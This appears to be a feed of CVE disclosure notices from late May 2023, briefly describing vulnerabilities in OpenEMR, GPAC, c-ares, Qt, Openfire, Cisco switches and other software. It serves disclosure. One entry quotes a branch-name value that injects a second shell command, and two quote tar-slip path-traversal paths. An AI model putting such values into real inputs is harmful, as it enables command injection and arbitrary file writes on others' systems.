🚨 CVE-2023-2962A vulnerability, which was classified as critical, has been found in SourceCodester Faculty Evaluation System 1.0. Affected by this issue is some unknown functionality of the file index.php?page=edit_user. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230150 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-29 12:58:12 |
🚨 CVE-2023-2808Mattermost fails to normalize UTF confusable characters when determining if a preview should be generated for a hyperlink, allowing an attacker to trigger link preview on a disallowed domain using a specially crafted link.🎖@cveNotify |
|
| 2023-05-29 10:58:12 |
🚨 CVE-2023-2955A vulnerability, which was classified as critical, was found in SourceCodester Students Online Internship Timesheet System 1.0. Affected is an unknown function of the file rendered_report.php of the component GET Parameter Handler. The manipulation of the argument sid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230142 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-29 05:58:31 |
🚨 CVE-2021-46887Lack of length check vulnerability in the HW_KEYMASTER module. Successful exploitation of this vulnerability may cause out-of-bounds read.🎖@cveNotify |
|
| 2023-05-29 05:58:30 |
🚨 CVE-2021-46883The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-29 05:58:29 |
🚨 CVE-2021-46884The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-29 05:58:25 |
🚨 CVE-2023-33439Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.🎖@cveNotify |
|
| 2023-05-29 05:58:24 |
🚨 CVE-2021-46881The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-29 05:58:23 |
🚨 CVE-2021-46882The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-29 05:58:19 |
🚨 CVE-2023-33355IceCMS v1.0.0 has Insecure Permissions. There is unauthorized access to the API, resulting in the disclosure of sensitive information.🎖@cveNotify |
|
| 2023-05-29 05:58:18 |
🚨 CVE-2023-24602OX App Suite before frontend 7.10.6-rev24 allows XSS via data to the Tumblr portal widget, such as a post title.🎖@cveNotify |
|
| 2023-05-29 05:58:17 |
🚨 CVE-2023-24604OX App Suite before backend 7.10.6-rev37 does not check HTTP header lengths when downloading, e.g., potentially allowing a crafted iCal feed to provide an unlimited amount of header data.🎖@cveNotify |
|
| 2023-05-29 05:58:14 |
🚨 CVE-2023-24605OX App Suite before backend 7.10.6-rev37 does not enforce 2FA for all endpoints, e.g., reading from a drive, reading contact data, and renaming tokens.🎖@cveNotify |
|
| 2023-05-29 05:58:13 |
🚨 CVE-2023-24599OX App Suite before backend 7.10.6-rev37 allows authenticated users to change the appointments of arbitrary users via conflicting ID numbers, aka "ID confusion."🎖@cveNotify |
|
| 2023-05-29 05:58:12 |
🚨 CVE-2023-24603OX App Suite before backend 7.10.6-rev37 does not check size limits when downloading, e.g., potentially allowing a crafted iCal feed to provide an unlimited amount of data.🎖@cveNotify |
|
| 2023-05-29 00:58:14 |
🚨 CVE-2023-32762An issue was discovered in Qt before 5.15.14, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1. Qt Network incorrectly parses the strict-transport-security (HSTS) header, allowing unencrypted connections to be established, even when explicitly prohibited by the server. This happens if the case used for this header does not exactly match.🎖@cveNotify |
|
| 2023-05-29 00:58:13 |
🚨 CVE-2023-32763An issue was discovered in Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1. When a SVG file with an image inside it is rendered, a QTextLayout buffer overflow can be triggered.🎖@cveNotify |
|
| 2023-05-29 00:58:12 |
🚨 CVE-2023-33291In ebankIT 6, the public endpoints /public/token/Email/generate and /public/token/SMS/generate allow generation of OTP messages to any e-mail address or phone number without validation. (It cannot be exploited with e-mail addresses or phone numbers that are registered in the application.)🎖@cveNotify |
|
| 2023-05-28 18:58:12 |
🚨 CVE-2023-33216Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments woodiscuz-woocommerce-comments allows Stored XSS.This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.2.9.🎖@cveNotify |
|
| 2023-05-28 14:58:13 |
🚨 CVE-2014-125101A vulnerability classified as critical has been found in Portfolio Gallery Plugin up to 1.1.8 on WordPress. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. Upgrading to version 1.1.9 is able to address this issue. The name of the patch is 58ed88243e17df766036f4857041edaf358076d3. It is recommended to upgrade the affected component. The identifier VDB-230085 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-28 14:58:12 |
🚨 CVE-2015-10106A vulnerability classified as critical was found in mback2k mh_httpbl Extension up to 1.1.7 on TYPO3. This vulnerability affects the function moduleContent of the file mod1/index.php. The manipulation leads to sql injection. The attack can be initiated remotely. Upgrading to version 1.1.8 is able to address this issue. The name of the patch is 429f50f4e4795b20dae06735b41fb94f010722bf. It is recommended to upgrade the affected component. VDB-230086 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-28 10:58:21 |
🚨 CVE-2023-1667A NULL pointer dereference was found In libssh during re-keying with algorithm guessing. This issue may allow an authenticated client to cause a denial of service.🎖@cveNotify |
|
| 2023-05-28 10:58:17 |
🚨 CVE-2023-2283A vulnerability was found in libssh, where the authentication check of the connecting client can be bypassed in the`pki_verify_data_signature` function in memory allocation problems. This issue may happen if there is insufficient memory or the memory usage is limited. The problem is caused by the return value `rc,` which is initialized to SSH_ERROR and later rewritten to save the return value of the function call `pki_key_check_hash_compatible.` The value of the variable is not changed between this point and the cryptographic verification. Therefore any error between them calls `goto error` returning SSH_OK.🎖@cveNotify |
|
| 2023-05-28 10:58:16 |
🚨 CVE-2023-31124c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android. This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.🎖@cveNotify |
|
| 2023-05-28 10:58:15 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2023-05-28 10:58:14 |
🚨 CVE-2023-31147c-ares is an asynchronous resolver library. When /dev/urandom or RtlGenRandom() are unavailable, c-ares uses rand() to generate random numbers used for DNS query ids. This is not a CSPRNG, and it is also not seeded by srand() so will generate predictable output. Input from the random number generator is fed into a non-compilant RC4 implementation and may not be as strong as the original RC4 implementation. No attempt is made to look for modern OS-provided CSPRNGs like arc4random() that is widely available. This issue has been fixed in version 1.19.1.🎖@cveNotify |
|
| 2023-05-28 10:58:13 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2023-05-28 05:58:21 |
🚨 CVE-2023-2949Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 05:58:20 |
🚨 CVE-2023-2950Improper Authorization in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 05:58:16 |
🚨 CVE-2023-2948Cross-site Scripting (XSS) - Generic in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 05:58:15 |
🚨 CVE-2023-1729A flaw was found in LibRaw. A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted file may lead to an application crash.🎖@cveNotify |
|
| 2023-05-28 05:58:14 |
🚨 CVE-2021-32142Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp.🎖@cveNotify |
|
| 2023-05-28 05:58:13 |
🚨 CVE-2023-2942Improper Input Validation in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 00:58:20 |
🚨 CVE-2023-2943Code Injection in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 00:58:16 |
🚨 CVE-2023-2946Improper Access Control in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 00:58:15 |
🚨 CVE-2023-2942Improper Input Validation in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 00:58:14 |
🚨 CVE-2023-2945Missing Authorization in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-28 00:58:13 |
🚨 CVE-2023-2944Improper Access Control in GitHub repository openemr/openemr prior to 7.0.1.🎖@cveNotify |
|
| 2023-05-27 20:58:13 |
🚨 CVE-2023-29820** DISPUTED ** An issue found in Webroot SecureAnywhere Endpoint Protection CE 23.1 v.9.0.33.39 and before allows a local attacker to access sensitive information via the EXE installer. NOTE: the vendor's perspective is that this is not a separate vulnerability relative to CVE-2023-29818 and CVE-2023-29819.🎖@cveNotify |
|
| 2023-05-27 18:58:12 |
🚨 CVE-2023-32695socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3.🎖@cveNotify |
|
| 2023-05-27 16:58:12 |
🚨 CVE-2023-33204sysstat through 12.7.2 allows a multiplication integer overflow in check_overflow in common.c. NOTE: this issue exists because of an incomplete fix for CVE-2022-39377.🎖@cveNotify |
|
| 2023-05-27 12:58:12 |
🚨 CVE-2023-2928A vulnerability was found in DedeCMS up to 5.7.106. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file uploads/dede/article_allowurl_edit.php. The manipulation of the argument allurls leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230083.🎖@cveNotify |
|
| 2023-05-27 10:58:20 |
🚨 CVE-2023-2925A vulnerability, which was classified as problematic, was found in Webkul krayin crm 1.2.4. This affects an unknown part of the file /admin/contacts/organizations/edit/2 of the component Edit Person Page. The manipulation of the argument Organization leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230079. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-27 10:58:19 |
🚨 CVE-2023-2927A vulnerability was found in JIZHICMS 2.4.5. It has been classified as critical. Affected is the function index of the file TemplateController.php. The manipulation of the argument webapi leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230082 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-27 10:58:18 |
🚨 CVE-2023-2923A vulnerability classified as critical was found in Tenda AC6 US_AC6V1.0BR_V15.03.05.19. Affected by this vulnerability is the function fromDhcpListClient. The manipulation leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230077 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-27 10:58:14 |
🚨 CVE-2023-2924A vulnerability, which was classified as critical, has been found in Supcon SimField up to 1.80.00.00. Affected by this issue is some unknown functionality of the file /admin/reportupload.aspx. The manipulation of the argument files[] leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230078 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-27 10:58:13 |
🚨 CVE-2023-26129All versions of the package bwm-ng are vulnerable to Command Injection due to improper input sanitization in the 'check' function in the bwm-ng.js file. **Note:**To execute the code snippet and potentially exploit the vulnerability, the attacker needs to have the ability to run Node.js code within the target environment. This typically requires some level of access to the system or application hosting the Node.js environment.🎖@cveNotify |
|
| 2023-05-27 10:58:12 |
🚨 CVE-2023-33184Nextcloud Mail is a mail app in Nextcloud. A blind SSRF attack allowed to send GET requests to services running in the same web server. It is recommended that the Mail app is update to version 3.02, 2.2.5 or 1.15.3.🎖@cveNotify |
|
| 2023-05-27 06:58:35 |
🚨 CVE-2023-2839Divide By Zero in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-05-27 06:58:33 |
🚨 CVE-2023-2840NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-05-27 06:58:32 |
🚨 CVE-2023-1729A flaw was found in LibRaw. A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted file may lead to an application crash.🎖@cveNotify |
|
| 2023-05-27 06:58:31 |
🚨 CVE-2023-25076A buffer overflow vulnerability exists in the handling of wildcard backend hosts of SNIProxy 0.6.0-2 and the master branch (commit: 822bb80df9b7b345cc9eba55df74a07b498819ba). A specially crafted HTTP or TLS packet can lead to arbitrary code execution. An attacker could send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-05-27 06:58:30 |
🚨 CVE-2023-1654Denial of Service in GitHub repository gpac/gpac prior to 2.4.0.🎖@cveNotify |
|
| 2023-05-27 06:58:29 |
🚨 CVE-2023-1448A vulnerability, which was classified as problematic, was found in GPAC 2.3-DEV-rev35-gbbca86917-master. This affects the function gf_m2ts_process_sdt of the file media_tools/mpegts.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223293 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-27 06:58:28 |
🚨 CVE-2023-1449A vulnerability has been found in GPAC 2.3-DEV-rev35-gbbca86917-master and classified as problematic. This vulnerability affects the function gf_av1_reset_state of the file media_tools/av_parsers.c. The manipulation leads to double free. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223294 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-27 06:58:27 |
🚨 CVE-2023-1452A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223297 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-27 06:58:26 |
🚨 CVE-2021-32142Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp.🎖@cveNotify |
|
| 2023-05-27 06:58:25 |
🚨 CVE-2023-0866Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3.0-DEV.🎖@cveNotify |
|
| 2023-05-27 06:58:23 |
🚨 CVE-2023-0818Off-by-one Error in GitHub repository gpac/gpac prior to v2.3.0-DEV.🎖@cveNotify |
|
| 2023-05-27 06:58:22 |
🚨 CVE-2023-0819Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to v2.3.0-DEV.🎖@cveNotify |
|
| 2023-05-27 06:58:21 |
🚨 CVE-2023-0770Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.2.🎖@cveNotify |
|
| 2023-05-27 06:58:20 |
🚨 CVE-2023-23143Buffer overflow vulnerability in function avc_parse_slice in file media_tools/av_parsers.c. GPAC version 2.3-DEV-rev1-g4669ba229-master.🎖@cveNotify |
|
| 2023-05-27 06:58:19 |
🚨 CVE-2023-23144Integer overflow vulnerability in function Q_DecCoordOnUnitSphere file bifs/unquantize.c in GPAC version 2.2-rev0-gab012bbfb-master.🎖@cveNotify |
|
| 2023-05-27 06:58:17 |
🚨 CVE-2023-23145GPAC version 2.2-rev0-gab012bbfb-master was discovered to contain a memory leak in lsr_read_rare_full function.🎖@cveNotify |
|
| 2023-05-27 06:58:16 |
🚨 CVE-2022-47086GPAC MP4Box v2.1-DEV-rev574-g9d5bb184b contains a segmentation violation via the function gf_sm_load_init_swf at scene_manager/swf_parse.c🎖@cveNotify |
|
| 2023-05-27 06:58:15 |
🚨 CVE-2022-47091GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c🎖@cveNotify |
|
| 2023-05-27 06:58:14 |
🚨 CVE-2022-47094GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Null pointer dereference via filters/dmx_m2ts.c:343 in m2tsdmx_declare_pid🎖@cveNotify |
|
| 2023-05-27 06:58:13 |
🚨 CVE-2022-47095GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c🎖@cveNotify |
|
| 2023-05-27 00:58:33 |
🚨 CVE-2023-23556An error in BigInt conversion to Number in Hermes prior to commit a6dcafe6ded8e61658b40f5699878cd19a481f80 could have been used by a malicious attacker to execute arbitrary code due to an out-of-bound write. Note that this bug is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-27 00:58:32 |
🚨 CVE-2022-36326An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-27 00:58:31 |
🚨 CVE-2023-24833A use-after-free in BigIntPrimitive addition in Hermes prior to commit a6dcafe6ded8e61658b40f5699878cd19a481f80 could have been used by an attacker to leak raw data from Hermes VM’s heap. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-27 00:58:30 |
🚨 CVE-2023-32307Sofia-SIP is an open-source SIP User-Agent library, compliant with the IETF RFC3261 specification.Referring to [GHSA-8599-x7rq-fr54](https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-8599-x7rq-fr54), several other potential heap-over-flow and integer-overflow in stun_parse_attr_error_code and stun_parse_attr_uint32 were found because the lack of attributes length check when Sofia-SIP handles STUN packets. The previous patch of [GHSA-8599-x7rq-fr54](https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-8599-x7rq-fr54) fixed the vulnerability when attr_type did not match the enum value, but there are also vulnerabilities in the handling of other valid cases. The OOB read and integer-overflow made by attacker may lead to crash, high consumption of memory or even other more serious consequences. These issue have been addressed in version 1.13.15. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-05-27 00:58:26 |
🚨 CVE-2023-32315Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.🎖@cveNotify |
|
| 2023-05-27 00:58:25 |
🚨 CVE-2023-32317Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was found in the MOSS cheat checker functionality of Autolab. To exploit this vulnerability an authenticated attacker with instructor permissions needs to upload a specially crafted Tar file. Both "Base File Tar" and "Additional file archive" can be fed with Tar files that contain paths outside their target directories (e.g., `../../../../tmp/tarslipped2.sh`). When the MOSS cheat checker is started the files inside of the archives are expanded to the attacker-chosen locations. This issue may lead to arbitrary file write within the scope of the running process. This issue has been addressed in version 2.11.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-05-27 00:58:24 |
🚨 CVE-2023-32319Nextcloud server is an open source personal cloud implementation. Missing brute-force protection on the WebDAV endpoints via the basic auth header allowed to brute-force user credentials when the provided user name was not an email address. Users from version 24.0.0 onward are affected. This issue has been addressed in releases 24.0.11, 25.0.5 and 26.0.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-27 00:58:20 |
🚨 CVE-2023-32676Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was found in the Install assessment functionality of Autolab. To exploit this vulnerability an authenticated attacker with instructor permissions needs to upload a specially crafted Tar file. Using the install assessment functionality an attacker can feed a Tar file that contain files with paths pointing outside of the target directory (e.g., `../../../../tmp/tarslipped1.sh`). When the Install assessment form is submitted the files inside of the archives are expanded to the attacker-chosen locations. This issue has been addressed in version 2.11.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-05-27 00:58:19 |
🚨 CVE-2023-33199Rekor's goals are to provide an immutable tamper resistant ledger of metadata generated within a software projects supply chain. A malformed proposed entry of the `intoto/v0.0.2` type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal. This has been fixed in v1.2.0 of Rekor. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-27 00:58:18 |
🚨 CVE-2023-31128NextCloud Cookbook is a recipe library app. Prior to commit a46d9855 on the `master` branch and commit 489bb744 on the `main-0.9.x` branch, the `pull-checks.yml` workflow is vulnerable to command injection attacks because of using an untrusted `github.head_ref` field. The `github.head_ref` value is an attacker-controlled value. Assigning the value to `zzz";echo${IFS}"hello";#` can lead to command injection. Since the permission is not restricted, the attacker has a write-access to the repository. This issue is fixed in commit a46d9855 on the `master` branch and commit 489bb744 on the `main-0.9.x` branch. There is no risk for the user of the app within the NextCloud server. This only affects the main repository and possible forks of it. Those who have forked the NextCloud Cookbook repository should make sure their forks are on the latest version to prevent code injection attacks and similar.🎖@cveNotify |
|
| 2023-05-27 00:58:14 |
🚨 CVE-2023-21514Improper scheme validation from InstantPlay Deeplink in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API to install APK from Galaxy Store.🎖@cveNotify |
|
| 2023-05-27 00:58:13 |
🚨 CVE-2023-21516XSS vulnerability from InstantPlay in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API to install APK from Galaxy Store.🎖@cveNotify |
|
| 2023-05-27 00:58:12 |
🚨 CVE-2022-0637open redirect in pollbot (pollbot.services.mozilla.com) in versions before 1.4.6🎖@cveNotify |
|
| 2023-05-26 22:58:26 |
🚨 CVE-2023-33247Talend Data Catalog remote harvesting server before 8.0-20230413 contains a /upgrade endpoint that allows an unauthenticated WAR file to be deployed on the server. (A mitigation is that the remote harvesting server should be behind a firewall that only allows access to the Talend Data Catalog server.)🎖@cveNotify |
|
| 2023-05-26 22:58:25 |
🚨 CVE-2023-33255An issue was discovered in Papaya Viewer 4a42701. User-supplied input in form of DICOM or NIFTI images can be loaded into the Papaya web application without any kind of sanitization. This allows injection of arbitrary JavaScript code into image metadata, which is executed when that metadata is displayed in the Papaya web application🎖@cveNotify |
|
| 2023-05-26 22:58:24 |
🚨 CVE-2023-20862In Spring Security, versions 5.7.x prior to 5.7.8, versions 5.8.x prior to 5.8.3, and versions 6.0.x prior to 6.0.3, the logout support does not properly clean the security context if using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This vulnerability can keep users authenticated even after they performed logout. Users of affected versions should apply the following mitigation. 5.7.x users should upgrade to 5.7.8. 5.8.x users should upgrade to 5.8.3. 6.0.x users should upgrade to 6.0.3.🎖@cveNotify |
|
| 2023-05-26 22:58:21 |
🚨 CVE-2023-26048Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).🎖@cveNotify |
|
| 2023-05-26 22:58:20 |
🚨 CVE-2020-24736Buffer Overflow vulnerability found in SQLite3 v.3.27.1 and before allows a local attacker to cause a denial of service via a crafted script.🎖@cveNotify |
|
| 2023-05-26 22:58:19 |
🚨 CVE-2023-24536Multipart form parsing can consume large amounts of CPU and memory when processing form inputs containing very large numbers of parts. This stems from several causes: 1. mime/multipart.Reader.ReadForm limits the total memory a parsed multipart form can consume. ReadForm can undercount the amount of memory consumed, leading it to accept larger inputs than intended. 2. Limiting total memory does not account for increased pressure on the garbage collector from large numbers of small allocations in forms with many parts. 3. ReadForm can allocate a large number of short-lived buffers, further increasing pressure on the garbage collector. The combination of these factors can permit an attacker to cause an program that parses multipart forms to consume large amounts of CPU and memory, potentially resulting in a denial of service. This affects programs that use mime/multipart.Reader.ReadForm, as well as form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue. With fix, ReadForm now does a better job of estimating the memory consumption of parsed forms, and performs many fewer short-lived allocations. In addition, the fixed mime/multipart.Reader imposes the following limits on the size of parsed forms: 1. Forms parsed with ReadForm may contain no more than 1000 parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxparts=. 2. Form parts parsed with NextPart and NextRawPart may contain no more than 10,000 header fields. In addition, forms parsed with ReadForm may contain no more than 10,000 header fields across all parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxheaders=.🎖@cveNotify |
|
| 2023-05-26 22:58:15 |
🚨 CVE-2023-28756A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.🎖@cveNotify |
|
| 2023-05-26 22:58:14 |
🚨 CVE-2022-4744A double-free flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user registers the device when the register_netdevice function fails (NETDEV_REGISTER notifier). This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-26 21:58:35 |
🚨 CVE-2023-20161Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-26 21:58:34 |
🚨 CVE-2023-20160Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-26 21:58:33 |
🚨 CVE-2023-20159Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-26 21:58:29 |
🚨 CVE-2023-1424Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to cause a denial of service (DoS) condition or execute malicious code on a target product by sending specially crafted packets. A system reset of the product is required for recovery from a denial of service (DoS) condition and malicious code execution.🎖@cveNotify |
|
| 2023-05-26 21:58:28 |
🚨 CVE-2023-20158Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-26 21:58:27 |
🚨 CVE-2023-20157Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-26 21:58:26 |
🚨 CVE-2023-20110A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database.🎖@cveNotify |
|
| 2023-05-26 19:58:33 |
